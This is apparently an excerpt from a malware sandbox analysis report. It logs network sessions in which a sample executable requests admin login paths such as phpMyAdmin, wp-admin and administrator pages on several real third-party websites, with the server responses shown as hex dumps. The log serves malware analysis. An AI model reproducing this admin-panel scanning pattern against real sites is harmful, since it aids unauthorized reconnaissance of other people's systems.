                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="hr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <meta name="description" content=""> <meta property="fb:app_id" content="">
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 6d 6a 65 72 61 76 61 6e 6a 65 22 20 64 61 74 61 2d 67 72 6f 75 70 3d 22 2f 73 74 75 64 69 72 61 6e 6a 65 2d 75 2d 69 6e 6f 7a 65 6d 73 74 76 75 22 3e 50 72 6f 67 72 61 6d 20 70 72 6f 66 65 73 69 6f 6e 61 6c 6e 65 20 6f 72 69 6a 65 6e 74 61 63 69 6a 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 65 70 2d 63 6f 75 72 73 65 73 2f 69 65 6c 74 73 22 20 64 61 74 61 2d 67 72 6f 75 70 3d 22 2f 73 74 75 64 69 72 61 6e 6a 65 2d 75 2d 69 6e 6f 7a 65 6d 73 74 76 75 22 3e 49 45 4c 54 53 20 70 72 69 70 72 65 6d
                                                                                                                                                                                                    Data Ascii: mjeravanje" data-group="/studiranje-u-inozemstvu">Program profesionalne orijentacije</a></li> <li><a href="/prep-courses/ielts" data-group="/studiranje-u-inozemstvu">IELTS priprem
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 31 2d 69 74 65 6d 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 74 65 63 61 6a 65 76 69 2d 73 74 72 61 6e 69 68 2d 6a 65 7a 69 6b 61 22 20 64 61 74 61 2d 67 72 6f 75 70 3d 22 2f 74 65 63 61 6a 65 76 69 2d 73 74 72 61 6e 69 68 2d 6a 65 7a 69 6b 61 22 20 63 6c 61 73 73 3d 22 20 6e 61 76 2d 6c 31 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e
                                                                                                                                                                                                    Data Ascii: </li> <li class="nav-l1-item"> <a href="/tecajevi-stranih-jezika" data-group="/tecajevi-stranih-jezika" class=" nav-l1-link"> <span
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    303192.168.2.46291834.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC181OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC7295INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 31 63 35 32 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cooki1c52es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, S


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    304192.168.2.46324392.62.143.504436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC289OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: CMSSESSID80f9fd3f=n9r0q6tfn1hneshgldk0v63lt6
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.bunasta.eu/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC237INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.38 (Debian)Location: https://www.bunasta.eu/administrator/Content-Length: 326Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC326INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.bunasta.eu/administrator/">here</a>.</p><hr><address>Apache/2.4.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    305192.168.2.46323434.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC231OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.harasduberry.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC7301INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 66 66 38 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53 74
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cookiff8es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, St


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    306192.168.2.46288495.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC224OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=ggr72avlfjvqinhaol7mprbv57
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 30 61 62 37 61 34 35 61 37 30 61 64 61 66 37 38 39 32 33 30 65 38 32 32 61 61 34 33 31 62 37 33 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 35 3a 35 39 3a 34 31 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:41 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=0ab7a45a70adaf789230e822aa431b73|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:41 G
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC9214INData Raw: 32 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 23F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC14024INData Raw: 33 36 43 30 0d 0a 39 34 36 37 38 2f 63 61 74 2f 61 6c 6c 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 3c 53 54 52 49 4b 45 3e 42 65 6b 69 6a 6b 20 61 6c 6c 65 20 76 61 63 61 74 75 72 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 74 65 6d 43 6f 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 46 6f 74 6f 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 74 69 74 6c 65 3d 22 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22
                                                                                                                                                                                                    Data Ascii: 36C094678/cat/all" target="_self"><STRIKE>Bekijk alle vacatures</STRIKE></A></P></div></div></div>...LINKS--></div><div class="tItemCon"><div class="tFoto"><img style="" alt="" title="" width="1920" height="
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC3578INData Raw: 44 46 33 0d 0a 20 72 65 6c 65 76 61 6e 74 65 20 66 75 6e 63 74 69 65 73 20 6f 70 20 48 42 4f 2d 20 65 6e 20 57 4f 2d 6e 69 76 65 61 75 2e 3c 2f 64 69 76 3e 0a 09 09 09 3c 21 2d 2d 49 4e 54 52 4f 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 0a 09 09 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 20 6d 61 69 6e 4c 65 76 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6d 73 5f 63 61 74 65 67 6f 72 69 65 2f 39 34 36 37 37 2f 62 62 2f 31 2f 69 64 2f 39 34 36 37 37 22 20 74 69 74 6c 65 3d 22 53 69 74 65 6d 61 70 22 3e 53 69 74 65 6d 61 70 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                    Data Ascii: DF3 relevante functies op HBO- en WO-niveau.</div>...INTROLINKS--></div></li> <li class="col-md-4 mainLev"><a href="https://www.beachrecruitment.com/index.php/cms_categorie/94677/bb/1/id/94677" title="Sitemap">Sitemap</a> <
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    307192.168.2.46348115.235.14.141443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC170OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
